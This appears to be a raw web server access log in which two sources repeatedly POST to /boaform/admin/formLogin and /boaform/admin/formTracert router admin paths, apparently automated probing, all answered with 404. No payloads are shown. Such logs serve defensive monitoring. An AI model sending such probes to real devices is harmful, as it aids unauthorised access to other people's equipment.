45.134.225.133 - - [07/May/2025:08:42:52 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:42:56 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
176.65.137.188 - - [07/May/2025:08:43:00 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.137.188 - - [07/May/2025:08:43:00 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "-" "Mozilla/5.0"
176.65.137.188 - - [07/May/2025:08:43:00 +0530] "POST /boaform/admin/formTracert HTTP/1.1" 404 223 "-" "Mozilla/5.0"
45.134.225.133 - - [07/May/2025:08:44:23 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:44:26 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:08:44:32 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
176.65.142.182 - - [07/May/2025:08:44:58 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.142.182 - - [07/May/2025:08:44:58 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "-" "Mozilla/5.0"
176.65.142.182 - - [07/May/2025:08:44:58 +0530] "POST /boaform/admin/formTracert HTTP/1.1" 404 223 "-" "Mozilla/5.0"
